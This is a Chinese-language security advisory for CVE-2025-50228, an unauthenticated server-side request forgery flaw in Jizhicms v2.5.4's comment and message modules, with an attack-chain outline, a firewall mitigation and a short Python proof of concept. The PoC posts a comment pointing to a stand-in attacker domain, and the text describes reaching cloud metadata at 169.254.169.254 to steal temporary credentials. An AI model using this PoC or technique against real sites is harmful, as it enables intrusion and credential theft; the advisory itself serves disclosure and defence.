CVE-2025-50228 CVSS 9.1 严重

CVE-2025-50228 Jizhicms服务端请求伪造漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-50228

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Jizhicms

漏洞概述

Jizhicms v2.5.4版本在用户评价、留言及评论模块中存在严重的SSRF漏洞。攻击者无需认证即可利用该漏洞，诱导服务器向内网或任意地址发起请求，可能导致敏感信息泄露或内网渗透。

技术细节

该漏洞根源在于Jizhicms在处理用户提交的评价、留言和评论数据时，未能对其中包含的URL参数进行严格的格式校验和地址过滤。攻击者可以通过构造恶意的HTTP请求，将内网地址（如127.0.0.1, 192.168.x.x等）或云元数据服务地址（如169.254.169.254）作为参数传递给受影响接口。由于服务端会代替客户端向目标地址发起请求，攻击者可以利用此行为探测内网开放端口、读取本地敏感文件（在特定条件下）或窃取云服务的临时凭证。结合CVSS向量分析，该漏洞攻击复杂度低，无需用户交互，且对机密性和完整性影响较大。

攻击链分析

STEP 1

侦察

攻击者识别出目标网站使用的是Jizhicms v2.5.4版本，并确认评论、留言或评价接口对外开放。

STEP 2

漏洞利用

攻击者构造包含恶意URL（指向内网服务或攻击者控制的服务器）的数据包，发送至存在SSRF漏洞的接口。

STEP 3

服务端请求

Jizhicms服务器在处理数据时，解析并访问了攻击者指定的URL，向内网或外部发起连接。

STEP 4

信息泄露

攻击者根据响应时间、状态码或返回内容，判断内网端口状态，或获取云服务元数据等敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example: http://target.com/index.php/comment/add)
target_url = "http://target.com/index.php/comment/add"

# Attacker controlled server for monitoring DNS/HTTP requests (e.g., Burp Collaborator)
attacker_server = "http://attacker-controlled-domain.com"

# Payload attempting to trigger SSRF via the comment content field
# Note: Parameter names may vary based on actual form implementation
payload = {
    "content": "Check this out: " + attacker_server,
    "username": "ssrf_tester",
    "submit": "submit"
}

try:
    response = requests.post(target_url, data=payload)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check your server logs to see if the target requested the URL.")
        print("[+] Response from target:", response.text[:200])
    else:
        print("[-] Failed to send payload. Status code:", response.status_code)
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Jizhicms 2.5.4

防御指南

临时缓解措施

建议临时在系统防火墙或网络设备上限制Web服务器的出站连接，仅允许访问必要的外部地址，并阻断对内网网段及公有云元数据IP（169.254.169.254）的访问，直至完成官方修复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-50228
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-50228
3 Details https://www.cvedetails.com/cve/CVE-2025-50228/
4 VulDB https://vuldb.com/cve/CVE-2025-50228
5 Link https://github.com/Cherry-toto/jizhicms
6 Link https://github.com/Cherry-toto/jizhicms/issues/104
7 Link https://www.jizhicms.cn

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表